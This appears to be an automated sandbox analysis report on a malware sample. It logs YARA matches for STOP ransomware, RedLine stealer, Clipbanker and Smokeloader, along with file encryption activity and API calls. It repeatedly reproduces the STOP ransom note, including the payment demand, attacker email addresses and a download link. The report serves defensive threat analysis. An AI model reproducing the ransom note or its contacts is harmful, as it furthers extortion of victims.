            Source: C:\_readme.txtDropped file: ATTENTION!Don't worry, you can return all your files!All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.The only method of recovering files is to purchase decrypt tool and unique key for you.This software will decrypt all your encrypted files.What guarantees you have?You can send one of your encrypted file from your PC and we decrypt it for free.But we can decrypt only 1 file for free. File must not contain valuable information.Do not ask assistants from youtube and recovery data sites for help in recovering your data.They can use your free decryption quota and scam you.Our contact is emails in this text document only.You can get and look video overview decrypt tool:https://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73Price of private key and decrypt software is $999.Discount 50% available if you contact us first 72 hours, that's price for you is $499.Please note that you'll never restore your data without payment.Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.To get this software you need write on our e-mail:support@freshingmail.topReserve e-mail address to contact us:datarestorehelpyou@airmail.ccYour personal ID:0871PsawqSSLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4PJump to dropped file
            Source: Yara matchFile source: Process Memory Space: E609.exe PID: 2764, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: E609.exe PID: 5436, type: MEMORYSTR
            Source: Yara matchFile source: 9.2.E609.exe.4a115a0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 33.2.E609.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.E609.exe.4a715a0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 31.2.E609.exe.4a815a0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 25.2.E609.exe.4a715a0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 16.2.E609.exe.49e15a0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 33.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.E609.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.E609.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 31.2.E609.exe.4a815a0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.E609.exe.4a115a0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.E609.exe.4a715a0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.2.E609.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 25.2.E609.exe.4a715a0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 16.2.E609.exe.49e15a0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.E609.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000001F.00000002.2266971281.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.2873470043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.2211120304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.2186742765.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000002.2275243210.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.2077051792.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: E609.exe PID: 6956, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: E609.exe PID: 7048, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: E609.exe PID: 2844, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: E609.exe PID: 2764, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: E609.exe PID: 5688, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: E609.exe PID: 5436, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: E609.exe PID: 6008, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: E609.exe PID: 3128, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: E609.exe PID: 916, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: E609.exe PID: 4956, type: MEMORYSTR
            Source: C:\Users\user\AppData\Local\Temp\E609.exeFile moved: C:\Users\user\Desktop\XZXHAVGRAG\UMMBDNEQBN.xlsxJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeFile deleted: C:\Users\user\Desktop\XZXHAVGRAG\UMMBDNEQBN.xlsxJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeFile moved: C:\Users\user\Desktop\AIXACVYBSB\XZXHAVGRAG.pdfJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeFile deleted: C:\Users\user\Desktop\AIXACVYBSB\XZXHAVGRAG.pdfJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeFile moved: C:\Users\user\Desktop\DTBZGIOOSO\ONBQCLYSPU.xlsxJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeFile dropped: C:\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail addressJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\E609.exeFile dropped: C:\$WinREAgent\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail addressJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\E609.exeFile dropped: C:\$WinREAgent\Scratch\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail addressJump to dropped file
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeFile dropped: C:\Users\user\AppData\Local\VirtualStore\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail addressJump to dropped file
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeFile dropped: C:\Users\user\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail addressJump to dropped file

            System Summary

            barindex
            Source: 32.2.mstsca.exe.8a15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 32.2.mstsca.exe.8a15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 35.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 35.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 26.2.build3.exe.9715a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 26.2.build3.exe.9715a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 35.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 35.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 28.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 28.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 28.2.build3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 28.2.build3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 26.2.build3.exe.9715a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 26.2.build3.exe.9715a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 32.2.mstsca.exe.8a15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 32.2.mstsca.exe.8a15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 19.2.build2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
            Source: 18.2.build2.exe.2d915a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
            Source: 9.2.E609.exe.4a115a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 9.2.E609.exe.4a115a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 33.2.E609.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 33.2.E609.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 19.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
            Source: 14.2.E609.exe.4a715a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 14.2.E609.exe.4a715a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 31.2.E609.exe.4a815a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 31.2.E609.exe.4a815a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 25.2.E609.exe.4a715a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 25.2.E609.exe.4a715a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 15.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 15.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 18.2.build2.exe.2d915a0.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
            Source: 16.2.E609.exe.49e15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 16.2.E609.exe.49e15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 33.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 33.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 10.2.E609.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 10.2.E609.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 17.2.E609.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 17.2.E609.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 31.2.E609.exe.4a815a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 31.2.E609.exe.4a815a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 10.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 10.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 9.2.E609.exe.4a115a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 9.2.E609.exe.4a115a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 17.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 17.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 14.2.E609.exe.4a715a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 14.2.E609.exe.4a715a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 27.2.E609.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 27.2.E609.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 25.2.E609.exe.4a715a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 25.2.E609.exe.4a715a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 16.2.E609.exe.49e15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 16.2.E609.exe.49e15a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 15.2.E609.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 15.2.E609.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 27.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 27.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 00000020.00000002.2341106813.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 00000020.00000002.2341106813.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 00000020.00000002.2341456493.00000000008DC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000010.00000002.2076965546.000000000494A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 0000001F.00000002.2266884728.00000000049E4000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000004.00000002.1982678563.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
            Source: 00000022.00000002.2343916720.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
            Source: 00000022.00000002.2344075429.0000000002E71000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
            Source: 0000000E.00000002.2060271846.00000000049DC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 0000001F.00000002.2266971281.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 00000000.00000002.1710124459.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 00000011.00000002.2873470043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 00000011.00000002.2873470043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 00000004.00000002.1982585941.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: 0000001A.00000002.2243695606.0000000000BBD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 00000000.00000002.1710342393.0000000002E4B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000023.00000002.2873086234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 00000023.00000002.2873086234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 0000001B.00000002.2211120304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 0000001B.00000002.2211120304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 00000019.00000002.2186742765.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 00000000.00000002.1710632872.00000000048F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
            Source: 00000022.00000002.2343814651.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: 00000004.00000002.1982993082.00000000048F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
            Source: 00000004.00000002.1982802841.0000000002F1B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000013.00000002.2651384676.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
            Source: 00000021.00000002.2275243210.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 00000021.00000002.2275243210.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 00000010.00000002.2077051792.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 00000000.00000002.1710474391.00000000048D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
            Source: 00000012.00000002.2110277221.0000000002E0E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000022.00000002.2344257451.0000000002EBE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000019.00000002.2186670157.00000000049D3000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000009.00000002.2029088899.0000000004976000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 0000001C.00000002.2244173274.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 0000001C.00000002.2244173274.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 0000001A.00000002.2243427238.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 0000001A.00000002.2243427238.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: Process Memory Space: E609.exe PID: 6956, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: Process Memory Space: E609.exe PID: 7048, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: Process Memory Space: E609.exe PID: 2844, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: Process Memory Space: E609.exe PID: 2764, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: Process Memory Space: E609.exe PID: 5688, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: Process Memory Space: E609.exe PID: 5436, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: Process Memory Space: E609.exe PID: 6008, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: Process Memory Space: E609.exe PID: 3128, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: Process Memory Space: E609.exe PID: 916, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: Process Memory Space: E609.exe PID: 4956, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004015D5
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401603 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401603
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040161A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040161A
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004026D2 NtOpenKey,0_2_004026D2
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402745 NtEnumerateKey,0_2_00402745
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402348 NtQuerySystemInformation,NtQuerySystemInformation,0_2_00402348
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040156B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040156B
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402770 NtEnumerateKey,0_2_00402770
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040217B NtQuerySystemInformation,NtQuerySystemInformation,0_2_0040217B
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040217D NtQuerySystemInformation,NtQuerySystemInformation,0_2_0040217D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004021CB NtQuerySystemInformation,NtQuerySystemInformation,0_2_004021CB
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004017DF NtMapViewOfSection,NtMapViewOfSection,0_2_004017DF
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004015E0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004015E0
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004015F1 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004015F1
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004015F5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004015F5
